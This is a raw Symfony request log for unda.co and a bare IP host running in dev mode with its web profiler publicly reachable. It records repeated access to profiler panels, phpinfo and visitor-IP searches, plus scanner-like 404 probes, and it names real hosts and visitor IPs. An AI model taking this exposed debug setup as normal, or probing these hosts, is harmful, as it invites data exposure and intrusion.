[2025-12-17 05:49:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=security","method":"GET"} []
[2025-12-17 05:49:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 05:54:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 05:56:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=config","method":"GET"} []
[2025-12-17 05:56:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 05:57:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3bdca","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3bdca","method":"GET"} []
[2025-12-17 05:57:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 06:00:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1812fa","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1812fa?panel=swiftmailer","method":"GET"} []
[2025-12-17 06:00:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-17 06:01:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f8d329","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f8d329?panel=security","method":"GET"} []
[2025-12-17 06:01:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 06:03:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=twig","method":"GET"} []
[2025-12-17 06:03:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 06:03:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 06:07:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 06:08:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 06:09:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=time","method":"GET"} []
[2025-12-17 06:09:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 06:10:40] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"adab63","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/adab63/search/results?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
[2025-12-17 06:10:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
[2025-12-17 06:15:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8eafba","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8eafba","method":"GET"} []
[2025-12-17 06:15:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 06:16:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=security","method":"GET"} []
[2025-12-17 06:16:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 06:18:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?XDEBUG_SESSION_START=phpstorm","method":"GET"} []
[2025-12-17 06:19:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"758c80","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/758c80?panel=config","method":"GET"} []
[2025-12-17 06:19:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 06:19:24] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-17 06:21:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
[2025-12-17 06:21:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-17 06:21:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"585d47","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/585d47?panel=logger","method":"GET"} []
[2025-12-17 06:21:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-17 06:23:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=request","method":"GET"} []
[2025-12-17 06:23:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 06:29:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=config","method":"GET"} []
[2025-12-17 06:29:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 06:34:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 06:34:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32464c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32464c?panel=security","method":"GET"} []
[2025-12-17 06:34:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 06:36:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c?panel=cache","method":"GET"} []
[2025-12-17 06:36:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 06:36:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 06:37:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"44e619","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/44e619?panel=events","method":"GET"} []
[2025-12-17 06:37:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-17 06:42:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c5572c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c5572c","method":"GET"} []
[2025-12-17 06:42:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 06:46:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=45.58.159.9&limit=10&method=GET","method":"GET"} []
[2025-12-17 06:46:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=45.58.159.9&limit=10&method=GET","method":"GET"} []
[2025-12-17 06:49:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=cache","method":"GET"} []
[2025-12-17 06:49:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 06:55:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=twig","method":"GET"} []
[2025-12-17 06:55:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 07:00:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 07:02:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=time","method":"GET"} []
[2025-12-17 07:02:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 07:07:45] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 07:09:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=security","method":"GET"} []
[2025-12-17 07:09:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 07:11:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"75541a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/75541a?panel=events","method":"GET"} []
[2025-12-17 07:11:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-17 07:15:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85","method":"GET"} []
[2025-12-17 07:15:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 07:18:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 07:20:16] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 07:20:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 07:20:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 07:20:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /WuEL"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /WuEL\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 07:20:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /a"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /a\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 07:20:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /download/file.ext"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /download/file.ext\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 07:20:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /SiteLoader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /SiteLoader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 07:20:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mPlayer"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mPlayer\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 07:24:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=request","method":"GET"} []
[2025-12-17 07:24:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 07:32:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
[2025-12-17 07:32:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
[2025-12-17 07:32:09] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-17 07:32:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-17 07:32:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=config","method":"GET"} []
[2025-12-17 07:32:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 07:33:41] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b60b2a","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/b60b2a/search/results?ip=57.141.6.53&limit=10&method=GET","method":"GET"} []
[2025-12-17 07:33:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=57.141.6.53&limit=10&method=GET","method":"GET"} []
[2025-12-17 07:36:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00dd99","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/00dd99?panel=validator","method":"GET"} []
[2025-12-17 07:36:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-17 07:39:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de?panel=cache","method":"GET"} []
[2025-12-17 07:39:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 07:45:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2431de","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2431de","method":"GET"} []
[2025-12-17 07:45:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 07:48:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=logger","method":"GET"} []
[2025-12-17 07:48:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-17 07:51:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=twig","method":"GET"} []
[2025-12-17 07:51:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 07:57:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=time","method":"GET"} []
[2025-12-17 07:57:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 08:02:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=security","method":"GET"} []
[2025-12-17 08:02:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 08:08:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.82.11.99&limit=10","method":"GET"} []
[2025-12-17 08:08:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.82.11.99&limit=10","method":"GET"} []
[2025-12-17 08:08:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=request","method":"GET"} []
[2025-12-17 08:08:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
